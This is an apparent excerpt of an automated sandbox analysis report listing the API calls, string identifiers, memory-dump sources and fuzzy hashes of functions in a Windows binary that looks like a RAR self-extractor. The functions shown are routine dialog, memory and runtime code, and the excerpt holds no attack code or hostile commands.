                            • Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D
                          • SetDlgItemTextW.USER32(?,00000066,003B946A), ref: 0038C59E
                          • _wcschr.LIBVCRUNTIME ref: 0038C5D1
                          • EndDialog.USER32(?,00000001), ref: 0038C6B2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                          • String ID: %s%s%u
                          • API String ID: 2892007947-1360425832
                          • Opcode ID: be4168964ec781bda815ae777aecd96bc423d706e76f199e35b73e3a128072e7
                          • Instruction ID: 81bacd0743c4fa6a32ce1496da9ccfb70c0914ea37d5ba13af5ff6f276981f78
                          • Opcode Fuzzy Hash: be4168964ec781bda815ae777aecd96bc423d706e76f199e35b73e3a128072e7
                          • Instruction Fuzzy Hash: 63416D71D10618AADB27EBA0DC45FEA77BCAB48305F0190E6E609E6061E7759BC4CB60
                          Function 00389635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(?,00000000), ref: 0038964E
                          • GetWindowRect.USER32(?,00000000), ref: 00389693
                          • ShowWindow.USER32(?,00000005,00000000), ref: 0038972A
                          • SetWindowTextW.USER32(?,00000000), ref: 00389732
                          • ShowWindow.USER32(00000000,00000005), ref: 00389748
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Window$Show$RectText
                          • String ID: RarHtmlClassName
                          • API String ID: 3937224194-1658105358
                          • Opcode ID: 574a606459fbe0ddcf76259a7c0f68c6a4707a23d2cb38f05ee58a6c2cda99c9
                          • Instruction ID: db7f8d4acf498e9d94eab5df95a6e47c341acf3832c04f0549a5c5534675c4e1
                          • Opcode Fuzzy Hash: 574a606459fbe0ddcf76259a7c0f68c6a4707a23d2cb38f05ee58a6c2cda99c9
                          • Instruction Fuzzy Hash: 9E31CF31005310EFCB13AF64EC48B6B7BACEF48711F09859AFE499A162DB34D905CB61
                          Function 0039BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0039BF79: _free.LIBCMT ref: 0039BFA2
                          • _free.LIBCMT ref: 0039C003
                            • Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?), ref: 003984F4
                            • Part of subcall function 003984DE: GetLastError.KERNEL32(?,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?,?), ref: 00398506
                          • _free.LIBCMT ref: 0039C00E
                          • _free.LIBCMT ref: 0039C019
                          • _free.LIBCMT ref: 0039C06D
                          • _free.LIBCMT ref: 0039C078
                          • _free.LIBCMT ref: 0039C083
                          • _free.LIBCMT ref: 0039C08E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                          • Instruction ID: abea622e9e210b1c235d9a051cbbc070e6b00970abb5648d76a2f975d4b2f30f
                          • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                          • Instruction Fuzzy Hash: DA116D32540B08FBDE22BBB4DD4BFCBF79D6F41700F418824B29E6A452DB64F9048A90
                          Function 003920CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,003920C1,0038FB12), ref: 003920D8
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003920E6
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003920FF
                          • SetLastError.KERNEL32(00000000,?,003920C1,0038FB12), ref: 00392151
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: fa78fa5e1efcbc11bff6ba81d9ff09b4a2979d560427e83ab7a9926cc9ebbdf7
                          • Instruction ID: 7f7e1b4fbddedfed5b262407d84f9e37ddd07f6f20bef74f72cc995c9ce7f64c
                          • Opcode Fuzzy Hash: fa78fa5e1efcbc11bff6ba81d9ff09b4a2979d560427e83ab7a9926cc9ebbdf7
                          • Instruction Fuzzy Hash: 7701A736249B117EBF672BB5BC8996B2B4CEB537B4B220B2AF210591F1EF518C119244
                          Function 0038DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                          • API String ID: 0-1718035505
                          • Opcode ID: daecddbbc7fbe090df51bc3770fd9d4c74cc1f26a380449488bc707d50c69696
                          • Instruction ID: af2356f6343fe41bbbf71cdbceb90ed352cdb32cff396a388c96920d5d212a61
                          • Opcode Fuzzy Hash: daecddbbc7fbe090df51bc3770fd9d4c74cc1f26a380449488bc707d50c69696
                          • Instruction Fuzzy Hash: 2B012D726513225B4F237F756C857EA67ACEE43B12B2201BBE502D7380DA91CC45D7A0
                          Function 00398060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 0039807E
                            • Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?), ref: 003984F4
                            • Part of subcall function 003984DE: GetLastError.KERNEL32(?,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?,?), ref: 00398506
                          • _free.LIBCMT ref: 00398090
                          • _free.LIBCMT ref: 003980A3
                          • _free.LIBCMT ref: 003980B4
                          • _free.LIBCMT ref: 003980C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID: :
                          • API String ID: 776569668-3499768093
                          • Opcode ID: 5bd0bd90c17979e2daf85fa026022585bf92d5bf26564ee29ee30417905a774c
                          • Instruction ID: 0c043a6020c885f38fc11cee875e0d139773d094d778aa976369be02015519d3
                          • Opcode Fuzzy Hash: 5bd0bd90c17979e2daf85fa026022585bf92d5bf26564ee29ee30417905a774c
                          • Instruction Fuzzy Hash: 87F05E76902125AFCB136F16BC114057B6DFB56720B0B4A1BF800ABB70CF3298519FC1
                          Function 00380CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                          Download Yara Rule
                          APIs
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00380D0D
                            • Part of subcall function 0037ACF5: GetVersionExW.KERNEL32(?), ref: 0037AD1A
                          • LocalFileTimeToFileTime.KERNEL32(?,00380CB8), ref: 00380D31
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00380D47
                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00380D56
                          • SystemTimeToFileTime.KERNEL32(?,00380CB8), ref: 00380D64
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00380D72
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Time$File$System$Local$SpecificVersion
                          • String ID:
                          • API String ID: 2092733347-0
                          • Opcode ID: cbca1df93207a9d05951b4363f49a3d8ea98c6658bee245eb1c8d1afdedec656
                          • Instruction ID: cfd2f670fba22b3aaa11fe093d10343192881d053ac03d2b16cd644ffb2baf29
                          • Opcode Fuzzy Hash: cbca1df93207a9d05951b4363f49a3d8ea98c6658bee245eb1c8d1afdedec656
                          • Instruction Fuzzy Hash: 2E31E97A90020AEBCB05EFE5C8859EFBBBCFF58700F04455AE955E7210E7309645CB64
                          Function 003891B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: 3cae82b024700a2f38337d1ec2f3c92cbf22af54bc37c874367220e020d87b82
                          • Instruction ID: d43a36ba39d2f979a01c175b33fde519ddac2701717e06eba6a76198a1724e22
                          • Opcode Fuzzy Hash: 3cae82b024700a2f38337d1ec2f3c92cbf22af54bc37c874367220e020d87b82
                          • Instruction Fuzzy Hash: 4321A37160430EBBDB07BA10CC81F7B77ADEB91784B1889A6FC099A246E360ED459790
                          Function 0038D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0038D2F2
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0038D30C
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038D31D
                          • TranslateMessage.USER32(?), ref: 0038D327
                          • DispatchMessageW.USER32(?), ref: 0038D331
                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0038D33C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                          • String ID:
                          • API String ID: 2148572870-0
                          • Opcode ID: 773f8f1d6d1cd40cfec692e6aba48f271788ba48bccb57e8a43a84b076e21d1a
                          • Instruction ID: 823667c42f612bde1e91b5077d95279846ca520b8976755aaa6c5e183a90ef5a
                          • Opcode Fuzzy Hash: 773f8f1d6d1cd40cfec692e6aba48f271788ba48bccb57e8a43a84b076e21d1a
                          • Instruction Fuzzy Hash: 47F03C72A02219ABCB22ABA1EC4DEDBBF6DEF62391F048012F606D2050D6748541C7B1
                          Function 0038C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                          Download Yara Rule
                          APIs
                          • _wcschr.LIBVCRUNTIME ref: 0038C435
                            • Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CompareString_wcschr
                          • String ID: <$HIDE$MAX$MIN
                          • API String ID: 2548945186-3358265660
                          • Opcode ID: 69e5a7276df0a1868ec97f405d6b9a0cef68cc78eea46279f6e15b0f8038c2b7
                          • Instruction ID: 576767095bf5740e03b3ae93bcceea7d3a985f6b36ec552630d404d46616e2c0
                          • Opcode Fuzzy Hash: 69e5a7276df0a1868ec97f405d6b9a0cef68cc78eea46279f6e15b0f8038c2b7
                          • Instruction Fuzzy Hash: 5A318172910709AADF27EA95CC81FEA77BCEB54310F0140E6FA05E7051EBB59EC48B60
                          Function 0038A990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
                            • Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365
                          • EndDialog.USER32(?,00000001), ref: 0038A9DE
                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0038A9F6
                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 0038AA24
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ItemText$DialogWindow
                          • String ID: GETPASSWORD1$xj<
                          • API String ID: 445417207-1985457453
                          • Opcode ID: 60272082f61f149ca93969cfe8d28d21eab05caf851067fa41720f9f04912747
                          • Instruction ID: 1b98ef4ada700acfd62c6168042a057a95b5fd811babe03aa8175c1716348cbe
                          • Opcode Fuzzy Hash: 60272082f61f149ca93969cfe8d28d21eab05caf851067fa41720f9f04912747
                          • Instruction Fuzzy Hash: 6E11483394421CBAEB33AA749D09FFB372CEB49300F010093FA49B6480C2A49D51D772
                          Function 0038ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadBitmapW.USER32(00000065), ref: 0038ADFD
                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0038AE22
                          • DeleteObject.GDI32(00000000), ref: 0038AE54
                          • DeleteObject.GDI32(00000000), ref: 0038AE77
                            • Part of subcall function 00389E1C: FindResourceW.KERNEL32(0038AE4D,PNG,?,?,?,0038AE4D,00000066), ref: 00389E2E
                            • Part of subcall function 00389E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0038AE4D,00000066), ref: 00389E46
                            • Part of subcall function 00389E1C: LoadResource.KERNEL32(00000000,?,?,?,0038AE4D,00000066), ref: 00389E59
                            • Part of subcall function 00389E1C: LockResource.KERNEL32(00000000,?,?,?,0038AE4D,00000066), ref: 00389E64
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                          • String ID: ]
                          • API String ID: 142272564-3352871620
                          • Opcode ID: 027263013b7dbfe01e9d3a50823c78426517f23e9a4b1a0e08d3716b3a897d07
                          • Instruction ID: 18f597c976303de839c6421f3c78428b4293d7e0098aabdf0b16f73761c78074
                          • Opcode Fuzzy Hash: 027263013b7dbfe01e9d3a50823c78426517f23e9a4b1a0e08d3716b3a897d07
                          • Instruction Fuzzy Hash: 7B010032541715A7D7137764AC05B7FBB6EAB81B42F090193BE00AB291DA319C1593B2
                          Function 0038CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
                            • Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365
                          • EndDialog.USER32(?,00000001), ref: 0038CCDB
                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0038CCF1
                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 0038CD05
                          • SetDlgItemTextW.USER32(?,00000068), ref: 0038CD14
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ItemText$DialogWindow
                          • String ID: RENAMEDLG
                          • API String ID: 445417207-3299779563
                          • Opcode ID: b4b058f5b52053fc6a0d1603b790f5142166db1dee5093b2b2e147ffaa5591a3
                          • Instruction ID: 71d980f48e7e196007fd550cc3b1a5a5150a184b089a85ff05ac446452ea33bb
                          • Opcode Fuzzy Hash: b4b058f5b52053fc6a0d1603b790f5142166db1dee5093b2b2e147ffaa5591a3
                          • Instruction Fuzzy Hash: 5E0124322953107FD6236F64AC08F677B6CEB6AB02F118412F346A20E0C6B169068B75
                          Function 00392503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0039251A
                            • Part of subcall function 00392B52: ___AdjustPointer.LIBCMT ref: 00392B9C
                          • _UnwindNestedFrames.LIBCMT ref: 00392531
                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00392543
                          • CallCatchBlock.LIBVCRUNTIME ref: 00392567
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                          • String ID: /)9
                          • API String ID: 2633735394-3608399660
                          • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                          • Instruction ID: 75c074d27adc4b4e10adde498159573e5c41bd874ef404403204b05d256e0966
                          • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                          • Instruction Fuzzy Hash: 71011332000508BFCF13AF65DC41EDB7BBAEF59710F068014F9186A120C336E961EBA1
                          Function 003975C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00397573,00000000,?,00397513,00000000,003ABAD8,0000000C,0039766A,00000000,00000002), ref: 003975E2
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003975F5
                          • FreeLibrary.KERNEL32(00000000,?,?,?,00397573,00000000,?,00397513,00000000,003ABAD8,0000000C,0039766A,00000000,00000002), ref: 00397618
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 487e76caee72dca562d516c879af5ad784a7294596807fc164fd4771c6cbb6e0
